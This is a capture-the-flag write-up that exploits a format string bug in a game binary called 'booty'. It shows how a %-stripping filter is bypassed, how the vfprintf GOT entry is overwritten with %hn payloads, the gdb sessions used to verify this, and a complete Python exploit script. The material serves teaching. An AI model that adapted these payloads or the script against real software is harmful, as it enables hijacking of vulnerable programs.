I am not going to explain how Format String works since it is fully documented everywhere, I highly recommend to read Alex Reece blog about this topic before moving forward.
Introducing the game
When running booty for the first time you are prompt to enter a pirate name for what looks like a Arm Wrestling game:
.-= Pirate Arm Wrestling =-.
Who will become the next PIRATE KING?
If ye want the power and glory for yourself then show your worth!
Face the other challengers in a mighty arm wrestle and prove your right to rule.
What be ye fearsome pirate name?
>
After entering the pirate name, you are prompted with one of three available fight status:
a) Beer Wench is looking exhausted!
b) Beer Wench starts to tense up.
c) Beer Wench begins to flex their muscles.
Where "Beer Wench" is the name of the opponent.
Every time a fight status is displayed you need to select an action to take:
Choose an action, [p]ush [h]old [r]est:
>
If the right actions are selected (push when exhausted, rest when tense up and hold when flexing their muscles) , eventually the pirate will win the game and below message will be displayed:
The game asks the end user to change his pirate name and start again, it also prints a stack address that can be helpful to defeat ASLR if needed:
0xbfaea85f marks the spot of your treasure!
The vulnerability
The format string vulnerability exists in the vfprintf function printing the pirate name entered, there is no format (e.g. %s) passed as parameter to the function and therefore can be manipulated by the end user:
However, if we try to enter a pirate name with the % character it will be removed by below function:
But there are two bugs in above function:
a) Only the first percentage sign will be removed from the string entered, therefore if the pirate name is: %AAAA%p it will be changed to: 0AAAA%p. But because of the null char at the beginning, we cannot trigger the vulnerability yet. Here comes the second bug to the rescue.
b) Once we win the game, we have the chance to change the pirate name however, the memcpy function does not clean its buffer before reading the next pirate name and therefore we if we enter a single "B" the new name will end up being BAAAA%p
Let's replicate our assumption explain above, by entering %AAAA%p as the first pirate name and B as the second, and we get below result:
We confirmed our assumption and also at the bottom we can see a leak address 0x8048f40 when printing the pirate name, confirming the format string has been successfully executed.
Redirecting execution flow
From here on everything is fun, we have multiple options to gain code execution, one of the ways to exploit format string is by overwriting a key pointer to redirect the execution flow, for this, we need to gather some requirements:
a) Decide the pointer to overwrite: Always a good pointer candidate to overwrite can be taken from the relocations table where:
"relocations are entries in binaries that are left to be filled in later -- at link time by the toolchain linker or at runtime by the dynamic linker. A relocation in a binary is a descriptor which essentially says "determine the value of X, and put that value into the binary at offset Y"
Although with ASLR enabled, the base address of the functions will be different, the offsets at the relocation tables are always the same and therefore our exploit can be reliable. We can confirm this, let's list the relocations from booty:
#readelf -r booty
Relocation section '.rel.dyn' at offset 0x3d8 contains 3 entries:
Offset Info Type Sym.Value Sym. Name
0804a0f4 00000706 R_386_GLOB_DAT 00000000 __gmon_start__
0804a1a0 00001105 R_386_COPY 0804a1a0 stdin
0804a1a4 00000f05 R_386_COPY 0804a1a4 stdout
Relocation section '.rel.plt' at offset 0x3f0 contains 14 entries:
Offset Info Type Sym.Value Sym. Name
0804a104 00000107 R_386_JUMP_SLOT 00000000 fflush
0804a108 00000207 R_386_JUMP_SLOT 00000000 memcpy
0804a10c 00000307 R_386_JUMP_SLOT 00000000 fclose
0804a110 00000407 R_386_JUMP_SLOT 00000000 time
0804a114 00000507 R_386_JUMP_SLOT 00000000 _IO_getc
0804a118 00000607 R_386_JUMP_SLOT 00000000 _IO_putc
0804a11c 00000707 R_386_JUMP_SLOT 00000000 __gmon_start__
0804a120 00000807 R_386_JUMP_SLOT 00000000 exit
0804a124 00000907 R_386_JUMP_SLOT 00000000 srand
0804a128 00000a07 R_386_JUMP_SLOT 00000000 __libc_start_main
0804a12c 00000b07 R_386_JUMP_SLOT 00000000 fopen
0804a130 00000c07 R_386_JUMP_SLOT 00000000 strncpy
0804a134 00000d07 R_386_JUMP_SLOT 00000000 rand
0804a138 00000e07 R_386_JUMP_SLOT 00000000 vfprintf
The Offsets are listed on the first column, let's focus on the last row related to vfprintf function, at offset 0x0804a138 there will be a pointer to vfprintf function which will be calculated at link or run time, below we can see that by running booty two times the offset contains two different pointers:
gdb$ x/x 0x0804a138
0x804a138: 0xb7614c10
gdb$ x/x 0x804a138
0x804a138: 0xb75c2c10
What we are going to do is to change the pointer at this offset 0x0804a138 so that as soon as vfprintf is called it will point to our desired address!!!
c) We have the relocation offset to manipulate, the destination address to redirect the flow but how do we actually fulfill this? I highly encourage you to read this excellent blog for detailed steps.
Overwritten relocation offset
First we need to place the address to be overwritten in the stack and calculate the argument number so that we can control it via %
As explained in the Introducing the game section, in order to bypass the filter, we need to insert the first name as:
"%\xa1\x04\x08\x38\xa1\x04\x08"
Assuming the first % will be changed to 0, once we win the game and are prompted to change the name, we entered: 0x3a giving us a final name as:
"\x3a\xa1\x04\x08\x38\xa1\x04\x08"
We are sending (in little endian format) the higher two bytes 0x0804a138 and lower two bytes 0x0804a13a to be overwritten later.
In order to test it, you can run booty via socat as usual:
# socat tcp-listen:4444,fork exec:./booty
Then execute the exploit which must have a raw_input() instruction to give us a chance to attached gdb (full exploit at the end): #./exploit_booty.py
And finally in another window we run:
# ps -fea |grep booty
root 5021 2335 0 Dec08 pts/1 00:00:00 socat tcp-listen:4444,fork exec:./booty
root 6022 3313 0 Dec08 pts/3 00:00:01 vi exploit_booty.py
root 6942 3251 0 04:46 pts/2 00:00:00 /usr/bin/python ./exploit_booty.py
root 6943 5021 0 04:46 pts/1 00:00:00 socat tcp-listen:4444,fork exec:./booty
root 6944 6943 0 04:46 pts/1 00:00:00 ./booty
# gdb attach 6944
Before letting gdb to continue, let's set a breakpoint right before triggering the format string vuln at:
gdb$ br *0x08048a30
Breakpoint 1 at 0x8048a30
We let it run two times so that the two names can be entered:
gdb$ continue
gdb$ continue
Once the breakpoint is hit we print the stack content:
=> 0x8048a30: call 0x8048770
0x8048a35: mov DWORD PTR [esp],0x80499e3
0x8048a3c: call 0x8048770
0x8048a41: pop ecx
0x8048a42: pop esi
0x8048a43: lea esi,[esp+0x17]
0x8048a47: push esi
0x8048a48: push 0x804957c
--------------------------------------------------------------------------------
Breakpoint 1, 0x08048a30 in ?? ()
gdb$ x/64x $esp
0xbfa1ed30: 0xbfa1eda8 0x08048f40 0xbfa1ee58 0x08048796
0xbfa1ed40: 0xb76e24e0 0x080496e8 0xbfa1ed64 0x00a1eda0
0xbfa1ed50: 0xbfa1eda0 0x00000001 0xbfa1ede8 0x08048e51
0xbfa1ed60: 0xbfa1eda0 0x00000001 0xbfa1ee58 0x08048796
0xbfa1ed70: 0xb76e24e0 0x080499de 0xbfa1ed94 0x70a1ed88
0xbfa1ed80: 0xb75bce84 0xbfa1eda0 0x55555556 0x08048679
0xbfa1ed90: 0xbfa1eda0 0xbfa1ede8 0x08049ad0 0x00000000
0xbfa1eda0: 0x00000033 0x00000000 0x0804a13a 0x0804a138
If you do the math and count all the dwords in the stack skipping the first one since it is the return address, you will realize that the two addresses entered belong to the arguments 30th 0x0804a13a and 31st 0x0804a138.
Then the next step is to confirm we can change its content, so, if you remember we were planning at point b) above to filled this offset with the address: 0x080487C0, since we are going to overwrite only two bytes at a time we will split the target address into:
0804 = 2052 decimal
87C0 -> 0x87C0 -2052 = 32700 decimal
Here is where the specifier %n comes into play, below its man page definition:
The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted.
Let's see a practical example of %n:
#include
int main()
{
int val;
printf("count this %n this does not count\n", &val);
printf("val = %d\n", val);
return 0;
}
# ./n
count this this does not count
val = 11
What we just learned is that the specifier %n will stored at a provided address the number of characters written so far, that is the reason the string "this does not count" was not added to the final count. Also, we can manipulate argument number to use by %n which is the address to store the final count by using the dollar sign: $n, and last but not least we can also tell %n to only write the higher two bytes by using hn modifier.
With all this features learned, we can come up with a request to overwrite the higher two bytes at address 0x0804a13a with 0x0804 assuming the target address is located at the argument 30th:
\x3a\xa1\x04\x08" + "%2048x%30$hn
Where:
\x3a\xa1\x04\x08 = Is the higher two bytes of the target address
%2048x = As mentioned above, we are trying to write 0x0804 = 2052 so 2048 + 4 bytes of the address give us the required amount to pass to %n
%30$hn = We tell specifier n to uset the 30th argument (which points to the target address in the stack) and only write the higher two bytes.
Let's test what we just learned by sending to booty the pirate name:
"%\xa1\x04\x08" + "%2048x%30$hn"
And "\x3a" as the new name once we win the game.
Again we set a breakpoint at 0x08048a30 and once we hit the breakpoint we step into the function to trigger the vulnerability, before executing vfprintf call we print the value of our higher two bytes of the target address:
Before:
=> 0x8048785: call 0x8048570
0x804878a: pop eax
0x804878b: push DWORD PTR ds:0x804a1a4
0x8048791: call 0x80484a0
0x8048796: add esp,0x1c
0x8048799: ret
0x804879a: lea esi,[esi+0x0]
0x80487a0: sub esp,0x14
--------------------------------------------------------------------------------
0x08048785 in ?? ()
gdb$ x/x 0x0804a13a
0x804a13a: 0x0000b75d
gdb$
Then we proceed to execute the vfprintf and print the content after:
=> 0x804878a: pop eax
0x804878b: push DWORD PTR ds:0x804a1a4
0x8048791: call 0x80484a0
0x8048796: add esp,0x1c
0x8048799: ret
0x804879a: lea esi,[esi+0x0]
0x80487a0: sub esp,0x14
0x80487a3: push 0x8048f40
--------------------------------------------------------------------------------
0x0804878a in ?? ()
gdb$ x/x 0x0804a13a
0x804a13a: 0x00000804
gdb$
Voila!!! We can see that we have successfully changed the higher two bytes of the target address. The final step is to made the math for the lower two bytes remaining of the target address located at 0x0804a138 which is the 31st argument as we learned before, so the final pirate string name will be:
"%\xa1\x04\x08\x38\xa1\x04\x08" + "%2044x%30$hn%32700x%31$hn"
Two important changes to point out with respect to the previous request, here we are using the two higher and lower bytes of the target address and therefore 8 bytes are sent before the $hn parameter which lowers the size sent before from 2048 to 2044 to keep the final size of 2052, we can see that the second size is equal to 32700 why? Remember that the bytes to overwrite are: 0x87C0
By doing the math, we already sent 2052 bytes before the second $hn so 0x87C0 - 2052 give us the remaining size equal to 32700.
Finally, by running the final exploit we can see that right after triggering the format string we have successfully overwritten the original pointer to vfprint to 0x080487C0 which is where the flag is printed out:
gdb$ x/x 0x0804a138
0x804a138: 0xb75ddc10 Before triggering the vulnerability
gdb$ ni
--------------------------------------------------------------------------[code]
=> 0x804878a: pop eax
0x804878b: push DWORD PTR ds:0x804a1a4
0x8048791: call 0x80484a0
0x8048796: add esp,0x1c
0x8048799: ret
0x804879a: lea esi,[esi+0x0]
0x80487a0: sub esp,0x14
0x80487a3: push 0x8048f40
--------------------------------------------------------------------------------
0x0804878a in ?? ()
gdb$ x/x 0x0804a138
0x804a138: 0x080487c0 Relocation offset overwritten
gdb$
So, if we keep stepping into the code as soon as a vfprintf call is made it will jump to our desired place:
--------------------------------------------------------------------------[code]
=> 0x8048785: call 0x8048570 <vfprintf@plt> Redirecting the flow here!!!
0x804878a: pop eax
0x804878b: push DWORD PTR ds:0x804a1a4
0x8048791: call 0x80484a0
0x8048796: add esp,0x1c
0x8048799: ret
0x804879a: lea esi,[esi+0x0]
0x80487a0: sub esp,0x14
--------------------------------------------------------------------------------
0x08048785 in ?? ()
gdb$ si
--------------------------------------------------------------------------[code]
=> 0x8048570
0x8048576
0x804857b
0x8048580: lea ecx,[esp+0x4]
0x8048584: and esp,0xfffffff0
0x8048587: xor eax,eax
0x8048589: push DWORD PTR [ecx-0x4]
0x804858c: push ebp
--------------------------------------------------------------------------------
0x08048570 in vfprintf@plt ()
gdb$ si
--------------------------------------------------------------------------[code]
=> 0x80487c0: push ebx
0x80487c1: sub esp,0x10
0x80487c4: push 0x8049a60
0x80487c9: push 0x8049861
0x80487ce: call 0x8048540
0x80487d3: add esp,0x10
0x80487d6: test eax,eax
0x80487d8: mov ebx,eax
--------------------------------------------------------------------------------
0x080487c0 in ?? ()
gdb$
Exploit source code:
#!/usr/bin/python
#Author: Danux Mitnick
#Date: Dec 5 2014
from socket import *
from time import sleep
s=socket(AF_INET, SOCK_STREAM)
s.connect(('localhost', 4444))
#Attach gdb here.
raw_input()
print s.recv(1024)
sleep(0.01)
cmd ="%\xa1\x04\x08\x38\xa1\x04\x08" + "%2044x%30$hn%32700x%31$hn"; #Overwritting vsprintf
s.send(cmd+"\n")
cont = 0
while 1:
sleep(0.01)
data = s.recv(1024)
print data
if "LEVEL" in data:
cmd = "h\n"
if "exhausted" in data:
cmd = "p\n"
if "flex" in data:
cmd = "h\n"
if "tense" in data:
cmd = "r\n"
if "again" in data:
cmd = "y\n"
if "name" in data:
cmd = "\x3a\n"
if ">" in data:
if cmd:
s.send(cmd)
cmd = ""
s.close()